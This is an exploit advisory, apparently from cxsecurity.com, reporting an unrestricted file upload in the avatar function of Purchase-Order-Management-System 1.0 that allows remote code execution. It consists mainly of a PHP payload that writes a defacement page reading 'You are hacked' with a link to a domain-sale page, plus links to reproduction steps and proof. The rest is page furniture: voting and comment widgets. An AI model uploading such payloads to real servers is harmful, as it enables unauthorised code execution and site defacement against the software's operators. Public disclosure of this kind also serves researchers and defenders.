Purchase-Order-Management-System-1.0 File-Upload-RCE

2023.12.14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Title: Purchase-Order-Management-System-1.0 File-Upload-RCE ## Author: nu11secur1ty ## Date: 12/14/2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-103796 ## Reference: https://portswigger.net/web-security/file-upload ## Description: The parameter custom-file-label in the avatar function is vulnerable to the File Upload vulnerability. The function is not sanitizing correctly, and the attacker can upload any extension of files on this system after this, he can execute it directly on the server using Curl protocol, web browser, etc.! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: ``` <?php // @nu11secur1ty 2023 $myfile = fopen("hacked.html", "w") or die("Unable to open file!"); $txt = "<p>You are hacked</p>\n"; fwrite($myfile, $txt); $txt = "<p><p>This is not good for you</p>\n<a href='https://sell.sawbrokers.com/domain/malicious.com/'target='_blank'>You can visit our website for more information!</a></p>\n"; fwrite($myfile, $txt); fclose($myfile); ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-System-1.0/Purchase-Order-Management-System-1.0-File-Upload-RCE) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/12/purchase-order-management-system-10_11.html) ## Time spent: 00:05:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top